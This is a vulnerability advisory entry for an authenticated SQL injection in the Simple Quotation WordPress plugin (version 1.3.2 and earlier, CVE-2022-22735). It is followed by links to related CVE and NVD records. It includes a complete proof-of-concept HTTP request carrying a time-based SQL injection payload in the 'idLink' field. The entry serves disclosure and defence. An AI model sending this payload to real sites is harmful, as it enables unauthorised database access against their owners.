Lucene search
Abhishek bhoirWPEX-ID:6940A97E-5A75-405C-BE74-BEDCC3A8EE00HistoryFeb 16, 2022 - 12:00 a.m.
Simple Quotation <= 1.3.2 - Subscriber+ SQL injection
2022-02-1600:00:00
abhishek bhoir
84
sql injection
subscriber+
post request
delete link
EPSS
0.001
Percentile
37.7%
The plugin does not have authorisation (and CSRF) checks in various of its AJAX actions and is lacking escaping of user data when using it in SQL statements, allowing any authenticated users, such as subscriber to perform SQL injection attacks
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 41
Connection: close
Cookie: [subscriber+]
action=delete_link&idLink=2+OR+SLEEP(2)--Related
cvelist
cvelist
CVE-2022-22735 Simple Quotation <= 1.3.2 - Subscriber+ SQL injection
2022-03-14 14:41:54
prion
prion
Design/Logic Flaw
2022-03-14 15:15:00
patchstack
patchstack
wpvulndb
wpvulndb
Simple Quotation <= 1.3.2 - Subscriber+ SQL injection
2022-02-16 00:00:00
cnvd
cnvd
WordPress Simple Quotation plugin SQL injection vulnerability
2022-03-16 00:00:00
nvd
nvd
CVE-2022-22735
2022-03-14 15:15:11
cve
cve
CVE-2022-22735
2022-03-14 15:15:11